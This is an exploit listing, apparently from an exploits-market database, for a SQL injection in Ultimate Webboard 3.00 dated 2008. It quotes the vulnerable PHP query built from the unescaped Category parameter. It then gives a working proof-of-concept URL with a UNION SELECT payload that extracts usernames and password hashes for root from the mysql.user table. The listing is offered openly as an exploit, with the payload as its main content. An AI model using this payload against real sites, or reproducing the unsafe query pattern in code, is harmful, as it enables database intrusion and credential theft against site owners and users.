[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability

Author
CWH Underground
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3763
Category
web applications
Date add
25-09-2008
Platform
unsorted
=============================================================
Ultimate Webboard 3.00 (Category) SQL Injection Vulnerability
=============================================================


  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 26 September 2008

#####################################################
APPLICATION : Ultimate Webboard 
VERSION     : 3.00
DOWNLOAD    : http://php.deeserver.net/download/get/79/webboard3.0.0.zip
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **

-----------------------------------
 Vulnerable File (webboard.php)
-----------------------------------

$sql="select * from board_data where Category='$Category' order by No DESC";

---------
 Exploit
---------

[+] http://[Target]/[webboard]/webboard.php?Category=[Category'name][SQL Injection]


------
 POC
------

[+] http://[Target]/[webboard]/webboard.php?Category=general'/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),3,4,5,6,7,8/**/FROM/**/mysql.user/**/where/**/user='root


#####################################################################




#  0day.today [2024-11-15]  #